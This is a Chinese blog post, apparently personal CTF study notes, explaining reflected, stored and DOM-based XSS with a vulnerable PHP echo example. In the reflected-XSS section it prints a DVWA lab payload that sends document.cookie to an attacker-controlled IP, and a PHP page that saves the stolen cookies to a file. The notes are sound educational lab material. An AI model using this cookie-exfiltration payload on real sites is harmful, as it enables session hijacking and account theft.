
<!DOCTYPE html>
<html lang="zh_CN">
<head>
    <meta charset="utf-8" />
    <title>XSS跨站脚本攻击 | Tremseの部屋</title>
    <meta name="author" content="Tremse" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/avatar.jpg" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>



<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.3.0"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>TREMSEの部屋</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;TREMSEの部屋</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>XSS跨站脚本攻击</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2024/11/7
        </span>
        
        <span class="category">
            <a href="/categories/CTF/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                CTF
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            
            <span class="tag">
                
                <a href="/tags/Web/" style="color: #00a596">
                    Web
                </a>
            </span>
            
            <span class="tag">
                
                <a href="/tags/PHP/" style="color: #ffa2c4">
                    PHP
                </a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        
    <div id="toc">
        <strong class="sidebar-title">&nbsp&nbsp&nbsp&nbsp目录</strong>
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#xss%E6%94%BB%E5%87%BB%E7%9A%84%E7%B1%BB%E5%9E%8B"><span class="toc-text">XSS攻击的类型</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#emsp1%E5%8F%8D%E5%B0%84%E5%9E%8B%E9%9D%9E%E6%8C%81%E4%B9%85%E5%8C%96xss"><span class="toc-text"> 1.反射型·非持久化XSS</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#emsp2%E5%AD%98%E5%82%A8%E5%9E%8B%E6%8C%81%E4%B9%85%E5%8C%96xss"><span class="toc-text"> 2.存储型·持久化XSS</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#emsp3dom%E5%9E%8Bxss"><span class="toc-text"> 3.DOM型XSS</span></a></li></ol></li></ol>
    </div>

        <blockquote>
<p>这是我的笔记！不太好参考噢~</p>
</blockquote>
<p>&emsp;&emsp;XSS即跨站脚本攻击(Cross Site Scripting),本来应该缩写成css，但毕竟三大件有了，就叫xss了。<font color="#ff9f9f"><strong>只有动态网站才有会被xss的可能</strong></font>，因为xss原理就是在网页中注入而已js语句，在用户访问时执行它们来达到目的，静态网站由于没有注入点(毕竟不需要交互，没有输入)是不会被攻击的。<br>&emsp;&emsp;比如某个页面后端用php编写，有以下源码:</p>
<pre><code class="PHP">&lt;?php
$xss = $_GET[&#39;x&#39;];
echo $xss;
?&gt;
</code></pre>
<p>&emsp;&emsp;那么很明显，我们可以通过控制x这个用户输入变量来干一些事情，插入一段js代码不在话下，这就是最简单的xss攻击了。</p>
<h3 id="xss攻击的类型"><a href="#XSS攻击的类型" class="headerlink" title="XSS攻击的类型"></a>XSS攻击的类型</h3><h4 id="emsp1反射型非持久化xss"><a href="#emsp-1-反射型·非持久化XSS" class="headerlink" title="&emsp;1.反射型·非持久化XSS"></a>&emsp;<font color="#5f5f5f">1.反射型·非持久化XSS</font></h4><p>&emsp;&emsp;一次性的XSS攻击，将XSS代码通过url中参数的形式发送至服务器，让其解析并返回含有XSS的结果给浏览器，使之执行XSS代码，达到攻击目的。<br>&emsp;&emsp;通过某些手段(比如rz学长非常喜欢玩的QR-code)让用户访问存在XSS的url，使得XSS攻击成功。一个应用就是拿取用户在本站的cookie。<br>&emsp;&emsp;以DVWA靶场的反射型XSS为例，如果我们如此构造一个url(注意靶场url，我是用docker部署的，8087端口映射到80)(注意script标签是不准确的，因为标准的会被识别为html标签所以这样绕过):</p>
<pre><code class="URL">http://localhost:8087/vulnerabilities/xss_r/?name=&lt;&quot;scripts&gt;document.location=&#39;http://192.168.43.15/cookiein.php?cookie=&#39;+document.cookie;&lt;&quot;/scripts&gt;
</code></pre>
<p>&emsp;&emsp;并且在我们的服务器上有这么一个页面(部署在”192.168.43.15&#x2F;cookiein.php”):</p>
<pre><code class="PHP">&lt;?php
$cookie=$_GET[&#39;cookie&#39;];
file_put_contents(&#39;cookie.txt&#39;,$cookie);
?&gt;
</code></pre>
<p>&emsp;&emsp;那么只要某个用户通过这个url进入靶场，那么就可以得到他的cookie并且存储到cookie.txt中。</p>
<h4 id="emsp2存储型持久化xss"><a href="#emsp-2-存储型·持久化XSS" class="headerlink" title="&emsp;2.存储型·持久化XSS"></a>&emsp;<font color="#5f5f5f">2.存储型·持久化XSS</font></h4><p>&emsp;&emsp;存储型XSS和反射型XSS的差别仅在于，<font color="#ff9f9f"><strong>提交的代码会存储在服务器端</strong></font>（数据库、内存、文件系统等），下次有用户请求目标页面时XSS会再次运行(已经成为了页面的一部分了)，从而攻击成功。这样甚至不用诱导目标访问某个url就能达到目的。<br>&emsp;&emsp;也就是说，只要进行一次XSS攻击，XSS恶意代码就会被保留在页面中，只要有用户访问该页面，就会触发。其它的和反射型XSS是一致的。</p>
<h4 id="emsp3dom型xss"><a href="#emsp-3-DOM型XSS" class="headerlink" title="&emsp;3.DOM型XSS"></a>&emsp;<font color="#5f5f5f">3.DOM型XSS</font></h4><p>&emsp;&emsp;利用步骤和反射型很类似，但是唯一的区别就是，构造的URL参数<font color="#ff9f9f"><strong>不用发送到服务器端</strong></font>，可以达到绕过WAF、躲避服务端检测的效果。</p>
<blockquote>
<p>详细例子见<a target="_blank" rel="noopener" href="https://www.cnblogs.com/mysticbinary/p/12542695.html">这里</a>~</p>
</blockquote>

    </div>
    
    
    
    
    
    
    
</div>
<link rel="stylesheet" href="/css/toc.css" />
            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2024 Tremseの部屋
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;Tremse
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    




    
</body>
</html>
